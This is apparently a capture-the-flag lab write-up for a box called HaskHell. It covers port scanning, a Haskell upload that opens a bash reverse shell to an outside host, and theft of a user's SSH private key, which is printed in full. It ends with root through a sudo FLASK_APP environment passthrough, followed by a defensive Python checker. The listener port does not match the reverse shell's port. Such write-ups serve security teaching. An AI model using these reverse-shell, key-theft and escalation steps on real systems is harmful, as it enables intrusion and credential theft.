# HaskHell

## Scanning

### Nmap

Scan for open ports and detect the service versions behind them:

```
nmap -sV -sC 10.10.245.91

Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-04 03:05 BST
Nmap scan report for ip-10-10-245-91.eu-west-1.compute.internal (10.10.245.91)
Host is up (0.00080s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
|_  256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (EdDSA)
5001/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
MAC Address: 02:A6:36:7C:DC:6D (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds
```

22 SSH\
5001 HTTP

## Enumeration

Browse the web server on port 5001 and take a look at the available pages.

**Only Haskell files are accepted for upload.**

### Brute Forcing

```
gobuster dir -u http://10.10.245.91:5001/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.245.91:5001/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/10/04 03:08:15 Starting gobuster
===============================================================
/submit (Status: 200)
===============================================================
2021/10/04 03:08:29 Finished
===============================================================
```

Dive into the upload page. Let's create our malicious Haskell file **rev.hs** (a reverse shell):

```
module Main where
import System.Process
main = callCommand "bash -c 'bash -i >& /dev/tcp/10.10.0.1/8080 0>&1'"
```

Set up a listener on the attack box:

```
rlwrap nc -nlvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
```

## Initial Access

Upload **rev.hs** through the **/submit** page; the server runs it and the listener receives a connection:

```
rlwrap nc -nlvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.245.91 56906 received!
bash: cannot set terminal process group (788): Inappropriate ioctl for device
bash: no job control in this shell
flask@haskhell:~$ id
id
uid=1001(flask) gid=1001(flask) groups=1001(flask)
```

* [x] User Shell "flask"

## Privilege Escalation

### Horizontal Escalation

We can read the SSH private key of the **prof** account:

```
flask@haskhell:~$ cat /home/prof/.ssh/id_rsa
cat /home/prof/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA068E6x8/vMcUcitx9zXoWsF8WjmBB04VgGklNQCSEHtzA9cr
94rYpUPcxxxYyw/dAii0W6srQuRCAbQxO5Di+tv9aWXmBGMEt0/3tOE7D09RhZGQ
b68lAFDjSSJaVlVzPi+waotyP2ccVJDjXkwK0KIm6RsACIOhM9GtI2wyZ6vOg4ss
Nb+7UY60iOkcOAWP09Omzjc2q7hcE6CuV6f7+iObamfGlZ4QQ5IvUj0etStDD6iU
WQX4vYewYqUz8bedccFvpC6uP2FGvDONYXrLWWua7wlwSgOqeXXxkG7fxVqYY2++
6ZVm8RE7TpPNxsQNDwpnxOiwTxGMgCrIMxgRVwIDAQABAoIBAQCTLXbf+wQXvtrq
XmaImQSKRUiuepjJeXLdqz1hUpo7t3lKTEqXfAQRM9PG5GCgHtFs9NwheCtGAOob
wSsR3TTTci0JIP4CQs4+nez96DNl+6IUmhawcDfrtlGwwZ/JsvPDYujnyziN+KTr
7ykGoRxL3tHq9Qja4posKzaUEGAjTz8NwrhzB6xatsmcWBV0fFoWzpS/xWzW3i7F
gAoYxc6+4s5bKHsJima2Aj5F3XtHfipkMdBvbl+sjGllgiQn/oEjYMIX5wc7+se2
o7FERO2oy3I5jUOlULsr9BwQpNFA2Qenc4Wc7ghb0LfCVaUs/RHQ7IQ4F3yp/G67
54oLue6hAoGBAPCe+WsnOXzhwQ9WXglhfztDR1lcwSFMeHZpcxYUVqmVEi2ZMLll
B67SCri9lHHyvBtrH7YmZO5Q9UcGXdLCZGmbkJUdX2bjqV0zwwx1qOiVY8LPnZSJ
LJN+0p1dRHsO3n4vTHO8mVuiM5THi6pcgzSTggIhS+e1ks7nlQKiBuD/AoGBAOE2
kwAMtvI03JlkjvOHsN5IhMbOXP0zaRSrKZArDCcqDojDL/AQltQkkLtQPdUPJgdY
3gOkUJ2BCHNlIsAtUjrTj+T76N512rO2sSidOEXRDCc+g/QwdgENiq/w9JroeWFc
g9qM3f2cl/EkjxRgiyuTfK6mbzcuMSveX4LfCXepAoGAd2MZc+4ZWvoUNUzwCY2D
eF8QVqlr9d6gYng9rvXWbfvV8iPxBfu3zSjQQwtlTQhYBu6m5FS2fXxTxrLE+J6U
/cU+/o19WWqaDPFy1IrIjOYagn1KvXk2UdR6IbQ2FyywfkFvmHk6Sjn3h9leVd/j
BcIunmnw5H214s0KpSzJZvcCgYA5Ca9VNeMnmIe+OZ+Swezjfw5Ro3YdkmWsnGTc
ZGqhiJ9Bt91uOWVZuSEGr53ZVgrVlYY0+eqI2WMghp60eUX4LBinb71cihCnrz9S
/+5+kCE51zVoJNXeEmXrhWUNzo7fP6UNNtwKHRzGL/IkwQa+NI5BVVmZahN9/sXF
yWMGcQKBgQDheyI7eKTDMsrEXwMUpl5aiwWPKJ0gY/2hS0WO3XGQtx6HBwg6jJKw
MMn8PNqYKF3DWex59PYiy5ZL1pUG2Y+iadGfIbStSZzN4nItF5+yC42Q2wlhtwgt
i4MU8bepL/GTMgaiR8RmU2qY7wRxfK2Yd+8+GDuzLPEoS7ONNjLhNA==
-----END RSA PRIVATE KEY-----
```

Copy it to the attack box as **prof.key**, then use it to connect to the target with a more stable shell:

```
root@ip-10-10-117-97:~# chmod 600 prof.key 
root@ip-10-10-117-97:~# ssh -i prof.key prof@10.10.245.91
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Oct  4 02:46:33 UTC 2021

  System load:  0.0                Processes:           106
  Usage of /:   26.3% of 19.56GB   Users logged in:     0
  Memory usage: 44%                IP address for eth0: 10.10.245.91
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Wed May 27 18:45:06 2020 from 192.168.126.128
$ id
uid=1002(prof) gid=1002(prof) groups=1002(prof)
```

* [x] User Shell "prof"

### Vertical Escalation

#### Sudo

Check what the prof account is allowed to run with sudo:

```
prof@haskhell:/home/flask$ sudo -l
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run
```

We can run `/usr/bin/flask run` as root without a password. Let's check what this binary does:

```
prof@haskhell:/home/flask$ cat /usr/bin/flask
#!/usr/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'Flask==0.12.2','console_scripts','flask'
__requires__ = 'Flask==0.12.2'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('Flask==0.12.2', 'console_scripts', 'flask')()
    )
prof@haskhell:/home/flask$ /usr/bin/flask run
Usage: flask run [OPTIONS]

Error: Could not locate Flask application. You did not provide the FLASK_APP environment variable.

For more information see http://flask.pocoo.org/docs/latest/quickstart/
```

Searching for this error, `You did not provide the FLASK_APP environment variable`, leads to the Flask docs. Note the `env_keep+=FLASK_APP` in the sudoers defaults above: sudo preserves that variable, so the Flask CLI, running as root, imports whichever Python file it names.

> The FLASK\_APP environment variable is **used to specify how to load the application**. While FLASK\_APP supports a variety of options for specifying your application, most use cases should be simple.

```
prof@haskhell:~$ echo 'import os; os.system("bash")' > shell.py
prof@haskhell:~$ cat shell.py 
import os; os.system("bash")
prof@haskhell:~$ export FLASK_APP=shell.py 
prof@haskhell:~$ sudo /usr/bin/flask run 
root@haskhell:~# id
uid=0(root) gid=0(root) groups=0(root)
```

* [x] Root Shell
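As an added defender-side example (not part of the original writeup): a small Python check that parses `sudo -l` output and flags rules where a preserved environment variable lets the permitted command load attacker-chosen code, which is exactly the `env_keep+=FLASK_APP` / `flask run` combination on this box. The `CODE_LOADING_VARS` table and the sample output string are constructed for this example.

```python
import re

# Constructed sample: the `sudo -l` output seen on the box.
SUDO_L_OUTPUT = """\
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run
"""

# Env vars that make the named program import/execute code from a user path.
# Assumed mapping for this example, keyed on the command's basename.
CODE_LOADING_VARS = {
    "flask": {"FLASK_APP"},
    "python": {"PYTHONPATH", "PYTHONSTARTUP"},
    "python3": {"PYTHONPATH", "PYTHONSTARTUP"},
    "perl": {"PERL5LIB", "PERL5OPT"},
}


def parse_sudo_l(text):
    """Return (env vars kept through sudo, [(runas, nopasswd, command), ...])."""
    kept = set()
    for m in re.finditer(r"env_keep\+?=(\S+)", text):
        kept.update(v for v in m.group(1).strip('"').split(",") if v)
    rules = []
    # Rule lines look like "    (root) NOPASSWD: /usr/bin/flask run".
    for m in re.finditer(r"^\s*\(([^)]+)\)\s+(NOPASSWD:)?\s*(.+?)\s*$", text, re.M):
        rules.append((m.group(1), m.group(2) is not None, m.group(3)))
    return kept, rules


def find_env_passthrough_risks(text):
    """Flag sudo rules whose command honours a variable that sudo preserves."""
    kept, rules = parse_sudo_l(text)
    findings = []
    for runas, nopasswd, cmd in rules:
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        risky = CODE_LOADING_VARS.get(prog, set()) & kept
        if risky:
            findings.append({"runas": runas, "nopasswd": nopasswd,
                             "command": cmd, "vars": sorted(risky)})
    return findings


if __name__ == "__main__":
    for f in find_env_passthrough_risks(SUDO_L_OUTPUT):
        print(f"RISK: ({f['runas']}) {f['command']} honours kept env {f['vars']}")
```

The fix on the host side is to drop `FLASK_APP` from `env_keep` (or not grant `flask run` via sudo at all), after which the check returns no findings.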
